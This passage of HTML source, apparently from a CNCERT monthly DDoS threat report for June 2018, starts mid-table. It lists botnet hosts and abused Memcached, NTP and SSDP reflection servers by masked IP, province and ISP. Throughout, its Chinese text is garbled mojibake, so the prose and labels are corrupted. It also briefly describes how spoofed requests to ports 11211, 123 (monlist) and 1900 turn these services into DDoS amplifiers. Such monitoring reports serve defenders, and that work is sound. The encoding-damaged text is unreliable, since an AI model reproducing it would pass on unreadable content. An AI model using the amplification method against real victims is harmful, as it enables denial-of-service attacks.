2438<tr>
2439<td>112.X.X.146</td>
2440<td>安徽çœ</td>
2441<td>è”通</td>
2442</tr>
2443<tr>
2444<td>111.X.X.53</td>
2445<td>剿ž—çœ</td>
2446<td>移动</td>
2447</tr>
2448<tr>
2449<td>114.X.X.253</td>
2450<td>北京市</td>
2451<td>待确认</td>
2452</tr>
2453<tr>
2454<td>116.X.X.243</td>
2455<td>æ²³å—çœ</td>
2456<td>è”通</td>
2457</tr>
2458<tr>
2459<td>125.X.X.214</td>
2460<td>北京市</td>
2461<td>è”通</td>
2462</tr>
2463<tr>
2464<td>119.X.X.110</td>
2465<td>å®å¤å›žæ—自治区</td>
2466<td>电信</td>
2467</tr>
2468<tr>
2469<td>39.X.X.51</td>
2470<td>江西çœ</td>
2471<td>移动</td>
2472</tr>
2473<tr>
2474<td>61.X.X.114</td>
2475<td>æ²³å—çœ</td>
2476<td>è”通</td>
2477</tr>
2478<tr>
2479<td>114.X.X.11</td>
2480<td>北京市</td>
2481<td>è”通</td>
2482</tr>
2483</tbody>
2484</table>
2485<p style="text-align: justify;">2018å¹´1月至今监测到的肉鸡资æºä¸ï¼Œå…±è®¡14,451个肉鸡在本月ä»å¤„于活跃状æ€ï¼Œå…¶ä¸ä½äºŽæˆ‘国境内的肉鸡数é‡ä¸º11,620个,ä½äºŽå¢ƒå¤–的肉鸡数é‡ä¸º2,831个。2018å¹´1月至今被æŒç»åˆ©ç”¨å‘èµ·DDoS攻击最多的肉鸡TOP20åŠå½’属如表4所示,ä½äºŽå±±è¥¿çœçš„åœ°å€æœ€å¤šã€‚</p>
2486<p style="text-align: center;">表4 2018年以æ¥è¢«åˆ©ç”¨å‘èµ·DDoSæ”»å‡»æ•°é‡æŽ’åTOP20,且在本月æŒç»æ´»è·ƒçš„è‚‰é¸¡åœ°å€ </p>
2487<table>
2488<colgroup>
2489<col>
2490<col>
2491<col> </colgroup>
2492<thead>
2493<tr>
2494<th>肉鸡地å€</th>
2495<th>归属çœä»½</th>
2496<th>归属è¿è¥å•†</th>
2497</tr>
2498</thead>
2499<tbody>
2500<tr>
2501<td>58.X.X.148</td>
2502<td>山东çœ</td>
2503<td>电信</td>
2504</tr>
2505<tr>
2506<td>124.X.X.2</td>
2507<td>山西çœ</td>
2508<td>è”通</td>
2509</tr>
2510<tr>
2511<td>123.X.X.32</td>
2512<td>内蒙å¤è‡ªæ²»åŒº</td>
2513<td>电信</td>
2514</tr>
2515<tr>
2516<td>122.X.X.199</td>
2517<td>æ²³å—çœ</td>
2518<td>è”通</td>
2519</tr>
2520<tr>
2521<td>183.X.X.66</td>
2522<td>山西çœ</td>
2523<td>移动</td>
2524</tr>
2525<tr>
2526<td>111.X.X.2</td>
2527<td>山西çœ</td>
2528<td>移动</td>
2529</tr>
2530<tr>
2531<td>60.X.X.211</td>
2532<td>山西çœ</td>
2533<td>è”通</td>
2534</tr>
2535<tr>
2536<td>106.X.X.223</td>
2537<td>新疆维å¾å°”æ—自治区</td>
2538<td>电信</td>
2539</tr>
2540<tr>
2541<td>124.X.X.2</td>
2542<td>æ²³å—çœ</td>
2543<td>è”通</td>
2544</tr>
2545<tr>
2546<td>118.X.X.101</td>
2547<td>å››å·çœ</td>
2548<td>电信</td>
2549</tr>
2550<tr>
2551<td>112.X.X.146</td>
2552<td>安徽çœ</td>
2553<td>è”通</td>
2554</tr>
2555<tr>
2556<td>111.X.X.53</td>
2557<td>剿ž—çœ</td>
2558<td>移动</td>
2559</tr>
2560<tr>
2561<td>114.X.X.253</td>
2562<td>北京市</td>
2563<td>待确认</td>
2564</tr>
2565<tr>
2566<td>116.X.X.243</td>
2567<td>æ²³å—çœ</td>
2568<td>è”通</td>
2569</tr>
2570<tr>
2571<td>39.X.X.51</td>
2572<td>江西çœ</td>
2573<td>移动</td>
2574</tr>
2575<tr>
2576<td>61.X.X.114</td>
2577<td>æ²³å—çœ</td>
2578<td>è”通</td>
2579</tr>
2580<tr>
2581<td>114.X.X.11</td>
2582<td>北京市</td>
2583<td>è”通</td>
2584</tr>
2585<tr>
2586<td>183.X.X.15</td>
2587<td>北京市</td>
2588<td>待确认</td>
2589</tr>
2590<tr>
2591<td>122.X.X.13</td>
2592<td>æ²³å—çœ</td>
2593<td>电信</td>
2594</tr>
2595<tr>
2596<td>61.X.X.28</td>
2597<td>甘肃çœ</td>
2598<td>电信</td>
2599</tr>
2600</tbody>
2601</table>
2602<p style="text-align: justify;">2018å¹´1月至今æŒç»æ´»è·ƒçš„å¢ƒå†…è‚‰é¸¡èµ„æºæŒ‰çœä»½ç»Ÿè®¡ï¼Œæµ™æ±Ÿçœå 的比例最大,å 11.6%,其次是山东çœã€å››å·çœå’Œå¹¿ä¸œçœï¼›æŒ‰è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 63.1%,è”通å 15.2%,移动å 12.4%,如图5所示。</p>
2603<p><img alt="2018å¹´ä»¥æ¥æŒç»æ´»è·ƒçš„è‚‰é¸¡æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324138839984.png!small" width="690" height="306.38532110091745"></p>
2604<p style="text-align: center;">图5 2018å¹´ä»¥æ¥æŒç»æ´»è·ƒçš„è‚‰é¸¡æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ </p>
2605<h3>3. å射攻击资æºåˆ†æž</h3>
2606<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,利用åå°„æœåС噍å‘起的三类é‡ç‚¹å射攻击共涉åŠ3,689,197å°åå°„æœåŠ¡å™¨ï¼Œå…¶ä¸å¢ƒå†…åå°„æœåС噍3,451,932å°ï¼Œå¢ƒå¤–åå°„æœåС噍237,265å°ã€‚å射攻击所利用Memcachedåå°„æœåС噍å‘èµ·å射攻击的åå°„æœåŠ¡å™¨æœ‰16,055å°ï¼Œå 比0.4%,其ä¸å¢ƒå†…åå°„æœåС噍13,410å°ï¼Œå¢ƒå¤–åå°„æœåС噍2,645å°ï¼›åˆ©ç”¨NTPåå°„å‘èµ·å射攻击的åå°„æœåŠ¡å™¨æœ‰772,835å°ï¼Œå 比20.9%,其ä¸å¢ƒå†…åå°„æœåС噍754,496å°ï¼Œå¢ƒå¤–åå°„æœåС噍18,339å°ï¼›åˆ©ç”¨SSDPåå°„å‘èµ·å射攻击的åå°„æœåŠ¡å™¨æœ‰2,900,307å°ï¼Œå 比78.6%,其ä¸å¢ƒå†…åå°„æœåС噍2,684,026å°ï¼Œå¢ƒå¤–åå°„æœåС噍216,281å°ã€‚</p>
2607<p style="text-align: justify;"><b>(1)Memcachedåå°„æœåŠ¡å™¨èµ„æº</b> </p>
2608</p>
2609<p style="text-align: justify;">Memcachedå射攻击利用了在互è”网上暴露的大批é‡MemcachedæœåŠ¡å™¨ï¼ˆä¸€ç§åˆ†å¸ƒå¼ç¼“å˜ç³»ç»Ÿï¼‰å˜åœ¨çš„认è¯å’Œè®¾è®¡ç¼ºé™·ï¼Œæ”»å‡»è€…通过å‘MemcachedæœåС噍IP地å€çš„默认端å£11211å‘é€ä¼ªé€ å—害者IP地å€çš„特定指令UDPæ•°æ®åŒ…,使MemcachedæœåС噍å‘å—害者IP地å€è¿”回比请求数æ®åŒ…大数å€çš„æ•°æ®ï¼Œä»Žè€Œè¿›è¡Œå射攻击。</p>
2610</p>
2611<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,利用MemcachedæœåŠ¡å™¨å®žæ–½å射攻击的事件共涉åŠå¢ƒå†…13,410å°åå°„æœåŠ¡å™¨ï¼Œå¢ƒå¤–2,645å°åå°„æœåŠ¡å™¨ã€‚</p>
2612</p>
2613<p style="text-align: justify;">本月境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡ï¼Œå±±ä¸œçœå 的比例最大,å 15.3%,其次是广东çœã€åŒ—京市和浙江çœï¼›æŒ‰å½’属è¿è¥å•†æˆ–云æœåŠ¡å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 36.7%ï¼Œç§»åŠ¨å æ¯”25.9%,è”é€šå æ¯”20.6%ï¼Œé˜¿é‡Œäº‘å æ¯”8.4%,如图6所示。</p>
2614</p>
2615<p><img alt="本月境内Memcachedåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ã€è¿è¥å•†æˆ–云æœåŠ¡å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324139049235.png!small" width="690" height="313.39694656488547"></p>
2616</p>
2617<p style="text-align: center;">图6 本月境内Memcachedåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ã€è¿è¥å•†æˆ–云æœåŠ¡å•†åˆ†å¸ƒ</p>
2618</p>
2619<p style="text-align: justify;">本月境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区统计,美国å 的比例最大,å 37.5%,其次是ä¸å›½é¦™æ¸¯ã€åŠ æ‹¿å¤§å’Œæ³•å›½ï¼Œå¦‚å›¾7所示。</p>
2620</p>
2621<p style="text-align: justify;"><img alt="本月境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区分布" src="http://image.3001.net/images/20180724/15324139675754.png!small" width="555" height="406.19565217391306"></p>
2622</p>
2623<p style="text-align: center;">图7 本月境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区分布</p>
2624</p>
2625<p style="text-align: justify;">本月境内å‘èµ·å射攻击事件数é‡TOP100ä¸ç›®å‰ä»å˜æ´»çš„memcachedæœåС噍åŠå½’属如表5所示,ä½äºŽåŒ—京市和河å—çœçš„åœ°å€æœ€å¤šã€‚</p>
2626</p>
2627<p style="text-align: center;">表5 本月境内å‘èµ·å射攻击事件数é‡TOP100ä¸ä»å˜æ´»çš„MemcachedæœåС噍TOP30</p>
2628</p>
2629<table>
2630<colgroup>
2631<col>
2632<col>
2633<col> </colgroup>
2634<thead>
2635<tr>
2636<th>åå°„æœåŠ¡å™¨åœ°å€</th>
2637<th>归属çœä»½</th>
2638<th>归属è¿è¥å•†æˆ–云æœåС商</th>
2639</tr>
2640</thead>
2641<tbody>
2642<tr>
2643<td>106.X.X.51</td>
2644<td>北京市</td>
2645<td>电信</td>
2646</tr>
2647<tr>
2648<td>122.X.X.232</td>
2649<td>æ²³å—çœ</td>
2650<td>è”通</td>
2651</tr>
2652<tr>
2653<td>122.X.X.38</td>
2654<td>æ²³å—çœ</td>
2655<td>è”通</td>
2656</tr>
2657<tr>
2658<td>58.X.X.166</td>
2659<td>山东çœ</td>
2660<td>电信</td>
2661</tr>
2662<tr>
2663<td>116.X.X.114</td>
2664<td>æ²³å—çœ</td>
2665<td>è”通</td>
2666</tr>
2667<tr>
2668<td>123.X.X.118</td>
2669<td>北京市</td>
2670<td>阿里云</td>
2671</tr>
2672<tr>
2673<td>116.X.X.206</td>
2674<td>æ²³å—çœ</td>
2675<td>è”通</td>
2676</tr>
2677<tr>
2678<td>116.X.X.102</td>
2679<td>æ²³å—çœ</td>
2680<td>è”通</td>
2681</tr>
2682<tr>
2683<td>116.X.X.195</td>
2684<td>æ²³å—çœ</td>
2685<td>è”通</td>
2686</tr>
2687<tr>
2688<td>101.X.X.82</td>
2689<td>北京市</td>
2690<td>阿里云</td>
2691</tr>
2692<tr>
2693<td>101.X.X.42</td>
2694<td>北京市</td>
2695<td>阿里云</td>
2696</tr>
2697<tr>
2698<td>182.X.X.107</td>
2699<td>北京市</td>
2700<td>阿里云</td>
2701</tr>
2702<tr>
2703<td>116.X.X.252</td>
2704<td>æ²³å—çœ</td>
2705<td>è”通</td>
2706</tr>
2707<tr>
2708<td>123.X.X.151</td>
2709<td>北京市</td>
2710<td>阿里云</td>
2711</tr>
2712<tr>
2713<td>123.X.X.195</td>
2714<td>北京市</td>
2715<td>阿里云</td>
2716</tr>
2717<tr>
2718<td>119.X.X.93</td>
2719<td>北京市</td>
2720<td>电信</td>
2721</tr>
2722<tr>
2723<td>116.X.X.34</td>
2724<td>æ²³å—çœ</td>
2725<td>è”通</td>
2726</tr>
2727<tr>
2728<td>123.X.X.233</td>
2729<td>北京市</td>
2730<td>阿里云</td>
2731</tr>
2732<tr>
2733<td>202.X.X.240</td>
2734<td>新疆维å¾å°”æ—自治区</td>
2735<td>电信</td>
2736</tr>
2737<tr>
2738<td>122.X.X.188</td>
2739<td>山东çœ</td>
2740<td>电信</td>
2741</tr>
2742<tr>
2743<td>117.X.X.92</td>
2744<td>陕西çœ</td>
2745<td>电信</td>
2746</tr>
2747<tr>
2748<td>101.X.X.97</td>
2749<td>北京市</td>
2750<td>阿里云</td>
2751</tr>
2752<tr>
2753<td>119.X.X.156</td>
2754<td>北京市</td>
2755<td>电信</td>
2756</tr>
2757<tr>
2758<td>119.X.X.137</td>
2759<td>北京市</td>
2760<td>电信</td>
2761</tr>
2762<tr>
2763<td>117.X.X.58</td>
2764<td>æ²³å—çœ</td>
2765<td>移动</td>
2766</tr>
2767<tr>
2768<td>120.X.X.23</td>
2769<td>安徽çœ</td>
2770<td>移动</td>
2771</tr>
2772<tr>
2773<td>122.X.X.100</td>
2774<td>æ²³å—çœ</td>
2775<td>è”通</td>
2776</tr>
2777<tr>
2778<td>123.X.X.237</td>
2779<td>北京市</td>
2780<td>阿里云</td>
2781</tr>
2782<tr>
2783<td>116.X.X.233</td>
2784<td>云å—çœ</td>
2785<td>电信</td>
2786</tr>
2787</tbody>
2788</table>
2789<p style="text-align: justify;">近两月至今被利用å‘起攻击的Memcachedåå°„æœåС噍ä¸ï¼Œå…±è®¡4,215个在本月ä»å¤„于活跃状æ€ï¼Œå…¶ä¸2,718个ä½äºŽå¢ƒå†…,1,497个ä½äºŽå¢ƒå¤–。近两月至今被æŒç»åˆ©ç”¨å‘起攻击的Memcachedåå°„æœåŠ¡å™¨æŒ‰çœä»½ç»Ÿè®¡ï¼Œå¹¿ä¸œçœå 的比例最大,å 18.7%ï¼Œå…¶æ¬¡æ˜¯åŒ—äº¬å¸‚ã€æµ™æ±Ÿçœã€å’Œå±±ä¸œçœï¼›æŒ‰è¿è¥å•†æˆ–云æœåŠ¡å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 30.5%,阿里云å 28.0%,è”通å 14.3%,移动å 11.1%,如图8所示。</p>
2790</p>
2791<p><img alt="近两月被æŒç»åˆ©ç”¨å‘起攻击的Memcachedåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½è¿è¥å•†æˆ–云æœåŠ¡å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324140095736.png!small" width="690" height="324.4864864864865"></p>
2792</p>
2793<p style="text-align: center;">图8 近两月被æŒç»åˆ©ç”¨å‘起攻击的Memcachedåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½è¿è¥å•†æˆ–云æœåŠ¡å•†åˆ†å¸ƒ</p>
2794</p>
2795<p><b>(2)NTPåå°„æœåŠ¡å™¨èµ„æº</b></p>
2796</p>
2797<p style="text-align: justify;">NTPå射攻击利用了NTP(一ç§é€šè¿‡äº’è”网æœåŠ¡äºŽè®¡ç®—æœºæ—¶é’ŸåŒæ¥çš„å议)æœåС噍å˜åœ¨çš„å议脆弱性,攻击者通过å‘NTPæœåС噍IP地å€çš„默认端å£123å‘é€ä¼ªé€ å—害者IP地å€çš„Monlist指令数æ®åŒ…,使NTPæœåС噍å‘å—害者IP地å€å射返回比原始数æ®åŒ…大数å€çš„æ•°æ®ï¼Œä»Žè€Œè¿›è¡Œå射攻击。 </p>
2798</p>
2799<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,NTPåå°„æ”»å‡»äº‹ä»¶å…±æ¶‰åŠæˆ‘国境内754,496å°åå°„æœåŠ¡å™¨ï¼Œå¢ƒå¤–18,339å°åå°„æœåŠ¡å™¨ã€‚è¢«åˆ©ç”¨å‘起攻击的NTPåå°„æœåŠ¡å™¨æ€»é‡è¾ƒä¸Šæœˆæœ‰ä¸€å®šæ•°é‡çš„回è½ã€‚</p>
2800</p>
2801<p style="text-align: justify;">本月被利用å‘èµ·NTPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡ï¼Œå¹¿ä¸œçœå 的比例最大,å 15.6%,其次是山东çœã€ç”˜è‚ƒçœå’Œæ±Ÿè‹çœï¼›æŒ‰å½’属è¿è¥å•†ç»Ÿè®¡ï¼Œç§»åЍå 的比例最大,å 39.9%ï¼Œç”µä¿¡å æ¯”39.4%,è”é€šå æ¯”19.1%,如图9所示。</p>
2802</p>
2803<p><img alt="本月被利用å‘èµ·NTPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324140252632.png!small" width="690" height="316.8239564428312"></p>
2804</p>
2805<p style="text-align: center;">图9 本月被利用å‘èµ·NTPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
2806</p>
2807<p style="text-align: justify;">本月被利用å‘èµ·NTPå射攻击的境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区统计,澳大利亚å 的比例最大,å 76.1%,其次是美国ã€å·´åŸºæ–¯å¦å’Œå°åº¦ï¼Œå¦‚图10所示。</p>
2808</p>
2809<p><img alt="本月被利用å‘èµ·NTPå射攻击的境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区分布" src="http://image.3001.net/images/20180724/15324140388839.png!small" width="555" height="412.09580838323353"> </p>
2810</p>
2811<p style="text-align: center;">图10 本月被利用å‘èµ·NTPå射攻击的境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区分布</p>
2812</p>
2813<p style="text-align: justify;">本月被利用å‘èµ·NTPå射攻击的境内åå°„æœåŠ¡å™¨æŒ‰è¢«åˆ©ç”¨å‘èµ·æ”»å‡»æ•°é‡æŽ’åTOP25åŠå½’属如表6所示,ä½äºŽå±±ä¸œçœå’Œå®å¤å›žæ—è‡ªæ²»åŒºçš„åœ°å€æœ€å¤šã€‚</p>
2814</p>
2815<p style="text-align: justify;">
2816</p>
2817<p style="text-align: center;">表6 本月境内被利用å‘èµ·NTPå射攻击的åå°„æœåŠ¡å™¨æŒ‰æ¶‰äº‹ä»¶æ•°é‡TOP25</p>
2818</p>
2819<table>
2820<colgroup>
2821<col>
2822<col>
2823<col> </colgroup>
2824<thead>
2825<tr>
2826<th>åå°„æœåŠ¡å™¨åœ°å€</th>
2827<th>归属çœä»½</th>
2828<th>归属è¿è¥å•†</th>
2829</tr>
2830</thead>
2831<tbody>
2832<tr>
2833<td>58.X.X.44</td>
2834<td>贵州çœ</td>
2835<td>è”通</td>
2836</tr>
2837<tr>
2838<td>111.X.X.208</td>
2839<td>山西çœ</td>
2840<td>移动</td>
2841</tr>
2842<tr>
2843<td>222.X.X.199</td>
2844<td>å®å¤å›žæ—自治区</td>
2845<td>电信</td>
2846</tr>
2847<tr>
2848<td>111.X.X.203</td>
2849<td>æ¹–å—çœ</td>
2850<td>移动</td>
2851</tr>
2852<tr>
2853<td>112.X.X.253</td>
2854<td>山东çœ</td>
2855<td>移动</td>
2856</tr>
2857<tr>
2858<td>112.X.X.251</td>
2859<td>山东çœ</td>
2860<td>移动</td>
2861</tr>
2862<tr>
2863<td>119.X.X.174</td>
2864<td>å®å¤å›žæ—自治区</td>
2865<td>电信</td>
2866</tr>
2867<tr>
2868<td>218.X.X.38</td>
2869<td>å®å¤å›žæ—自治区</td>
2870<td>电信</td>
2871</tr>
2872<tr>
2873<td>111.X.X.116</td>
2874<td>山东çœ</td>
2875<td>移动</td>
2876</tr>
2877<tr>
2878<td>61.X.X.190</td>
2879<td>å®å¤å›žæ—自治区</td>
2880<td>电信</td>
2881</tr>
2882<tr>
2883<td>111.X.X.168</td>
2884<td>山东çœ</td>
2885<td>移动</td>
2886</tr>
2887<tr>
2888<td>112.X.X.202</td>
2889<td>山东çœ</td>
2890<td>移动</td>
2891</tr>
2892<tr>
2893<td>218.X.X.130</td>
2894<td>å®å¤å›žæ—自治区</td>
2895<td>电信</td>
2896</tr>
2897<tr>
2898<td>14.X.X.143</td>
2899<td>å®å¤å›žæ—自治区</td>
2900<td>电信</td>
2901</tr>
2902<tr>
2903<td>120.X.X.162</td>
2904<td>山东çœ</td>
2905<td>移动</td>
2906</tr>
2907<tr>
2908<td>112.X.X.75</td>
2909<td>山东çœ</td>
2910<td>移动</td>
2911</tr>
2912<tr>
2913<td>111.X.X.204</td>
2914<td>æ¹–å—çœ</td>
2915<td>移动</td>
2916</tr>
2917<tr>
2918<td>123.X.X.126</td>
2919<td>内蒙å¤è‡ªæ²»åŒº</td>
2920<td>电信</td>
2921</tr>
2922<tr>
2923<td>111.X.X.234</td>
2924<td>山西çœ</td>
2925<td>移动</td>
2926</tr>
2927<tr>
2928<td>218.X.X.10</td>
2929<td>å®å¤å›žæ—自治区</td>
2930<td>电信</td>
2931</tr>
2932<tr>
2933<td>223.X.X.173</td>
2934<td>山东çœ</td>
2935<td>移动</td>
2936</tr>
2937<tr>
2938<td>211.X.X.188</td>
2939<td>山西çœ</td>
2940<td>移动</td>
2941</tr>
2942<tr>
2943<td>222.X.X.131</td>
2944<td>æ²³å—çœ</td>
2945<td>电信</td>
2946</tr>
2947<tr>
2948<td>111.X.X.88</td>
2949<td>山东çœ</td>
2950<td>移动</td>
2951</tr>
2952<tr>
2953<td>223.X.X.82</td>
2954<td>山东çœ</td>
2955<td>移动</td>
2956</tr>
2957</tbody>
2958</table>
2959<p style="text-align: justify;">近两月被æŒç»åˆ©ç”¨å‘起攻击的NTPåå°„æœåС噍ä¸ï¼Œå…±è®¡27,539个在本月ä»å¤„于活跃状æ€ï¼Œå…¶ä¸26,063个ä½äºŽå¢ƒå†…,1,476个ä½äºŽå¢ƒå¤–。近两月æŒç»æ´»è·ƒçš„NTPåå°„æœåŠ¡å™¨æŒ‰çœä»½ç»Ÿè®¡ï¼Œæ²³å—çœå 的比例最大,å 36.1%,其次是å®å¤å›žæ—è‡ªæ²»åŒºã€æ¹–北çœå’Œæ¹–å—çœï¼›æŒ‰è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 44.3%,移动å 24.3%,è”通å 19.9%,如图11所示。</p>
2960</p>
2961<p><img alt="近两月被æŒç»åˆ©ç”¨å‘起攻击的NTPåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½è¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324140526831.png!small" width="690" height="362.2181146025878"></p>
2962</p>
2963<p style="text-align: center;">图11 近两月被æŒç»åˆ©ç”¨å‘起攻击的NTPåå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½è¿è¥å•†åˆ†å¸ƒ</p>
2964</p>
2965<p style="text-align: justify;"><b>(3)SSDPåå°„æœåŠ¡å™¨èµ„æº</b></p>
2966</p>
2967<p style="text-align: justify;">SSDPå射攻击利用了SSDP(一ç§åº”用层å议,是构æˆé€šç”¨å³æ’å³ç”¨(UPnP)æŠ€æœ¯çš„æ ¸å¿ƒå议之一)æœåС噍å˜åœ¨çš„å议脆弱性,攻击者通过å‘SSDPæœåС噍IP地å€çš„默认端å£1900å‘é€ä¼ªé€ å—害者IP地å€çš„æŸ¥è¯¢è¯·æ±‚,使SSDPæœåС噍å‘å—害者IP地å€å射返回比原始数æ®åŒ…大数å€çš„åº”ç”æ•°æ®åŒ…,从而进行å射攻击。</p>
2968</p>
2969<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,SSDPå射攻击事件共涉åŠå¢ƒå†…2,684,026å°åå°„æœåŠ¡å™¨ï¼Œå¢ƒå¤–216,281å°åå°„æœåŠ¡å™¨ã€‚</p>
2970</p>
2971<p style="text-align: justify;">本月被利用å‘èµ·SSDPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡ï¼Œè¾½å®çœå 的比例最大,å 17.3%,其次是江è‹çœã€æ²³å—çœå’Œæµ™æ±Ÿçœï¼›æŒ‰å½’属è¿è¥å•†ç»Ÿè®¡ï¼Œè”通å 的比例最大,å 54.9%ï¼Œç”µä¿¡å æ¯”41.4%ï¼Œç§»åŠ¨å æ¯”3.3%,如图12所示。</p>
2972<p><img alt="本月被利用å‘èµ·SSDPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/1532414065800.png!small" width="690" height="311.95402298850576"> </p>
2973</p>
2974<p style="text-align: center;">图12 本月被利用å‘èµ·SSDPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
2975</p>
2976<p style="text-align: justify;">本月被利用å‘èµ·SSDPå射攻击的境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区统计,美国å 的比例最大,å 30.9%,其次是ä¸å›½å°æ¹¾ã€åŠ æ‹¿å¤§å’ŒéŸ©å›½ï¼Œå¦‚å›¾13所示。</p>
2977</p>
2978<p><img alt="本月被利用å‘èµ·SSDPå射攻击的境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区或地区分布" src="http://image.3001.net/images/20180724/15324140793672.png!small" width="555" height="440.7826086956522"> </p>
2979</p>
2980<p style="text-align: center;">图13 本月被利用å‘èµ·SSDPå射攻击的境外åå°„æœåŠ¡å™¨æ•°é‡æŒ‰å›½å®¶æˆ–地区或地区分布</p>
2981</p>
2982<p style="text-align: justify;">本月被利用å‘èµ·SSDPå射攻击的境内åå°„æœåŠ¡å™¨æŒ‰è¢«åˆ©ç”¨å‘èµ·æ”»å‡»æ•°é‡æŽ’åTOP20çš„åå°„æœåС噍åŠå½’属如表7所示,ä½äºŽäº‘å—çœå’Œå±±ä¸œçœçš„åœ°å€æœ€å¤šã€‚</p>
2983</p>
2984<p style="text-align: center;">表7 本月境内被利用å‘èµ·SSDPå射攻击事件数é‡ä¸æŽ’åTOP20çš„åå°„æœåС噍</p>
2985</p>
2986<table>
2987<colgroup>
2988<col>
2989<col>
2990<col> </colgroup>
2991<thead>
2992<tr>
2993<th>åå°„æœåŠ¡å™¨åœ°å€</th>
2994<th>归属çœä»½</th>
2995<th>归属è¿è¥å•†</th>
2996</tr>
2997</thead>
2998<tbody>
2999<tr>
3000<td>218.X.X.185</td>
3001<td>云å—çœ</td>
3002<td>电信</td>
3003</tr>
3004<tr>
3005<td>111.X.X.12</td>
3006<td>黑龙江çœ</td>
3007<td>移动</td>
3008</tr>
3009<tr>
3010<td>113.X.X.14</td>
3011<td>广西壮æ—自治区</td>
3012<td>电信</td>
3013</tr>
3014<tr>
3015<td>202.X.X.51</td>
3016<td>贵州çœ</td>
3017<td>电信</td>
3018</tr>
3019<tr>
3020<td>222.X.X.6</td>
3021<td>山东çœ</td>
3022<td>电信</td>
3023</tr>
3024<tr>
3025<td>218.X.X.186</td>
3026<td>云å—çœ</td>
3027<td>电信</td>
3028</tr>
3029<tr>
3030<td>222.X.X.6</td>
3031<td>山东çœ</td>
3032<td>电信</td>
3033</tr>
3034<tr>
3035<td>183.X.X.56</td>
3036<td>æ¹–å—çœ</td>
3037<td>移动</td>
3038</tr>
3039<tr>
3040<td>61.X.X.6</td>
3041<td>å®å¤å›žæ—自治区</td>
3042<td>电信</td>
3043</tr>
3044<tr>
3045<td>221.X.X.8</td>
3046<td>å››å·çœ</td>
3047<td>电信</td>
3048</tr>
3049<tr>
3050<td>106.X.X.14</td>
3051<td>内蒙å¤è‡ªæ²»åŒº</td>
3052<td>电信</td>
3053</tr>
3054<tr>
3055<td>116.X.X.15</td>
3056<td>云å—çœ</td>
3057<td>电信</td>
3058</tr>
3059<tr>
3060<td>58.X.X.142</td>
3061<td>山东çœ</td>
3062<td>电信</td>
3063</tr>
3064<tr>
3065<td>218.X.X.18</td>
3066<td>云å—çœ</td>
3067<td>电信</td>
3068</tr>
3069<tr>
3070<td>218.X.X.62</td>
3071<td>å®å¤å›žæ—自治区</td>
3072<td>电信</td>
3073</tr>
3074<tr>
3075<td>222.X.X.54</td>
3076<td>山东çœ</td>
3077<td>电信</td>
3078</tr>
3079<tr>
3080<td>222.X.X.10</td>
3081<td>é‡åº†å¸‚</td>
3082<td>电信</td>
3083</tr>
3084<tr>
3085<td>220.X.X.102</td>
3086<td>æ¹–å—çœ</td>
3087<td>电信</td>
3088</tr>
3089<tr>
3090<td>222.X.X.22</td>
3091<td>å®å¤å›žæ—自治区</td>
3092<td>电信</td>
3093</tr>
3094<tr>
3095<td>111.X.X.11</td>
3096<td>黑龙江çœ</td>
3097<td>移动</td>
3098</tr>
3099</tbody>
3100</table>
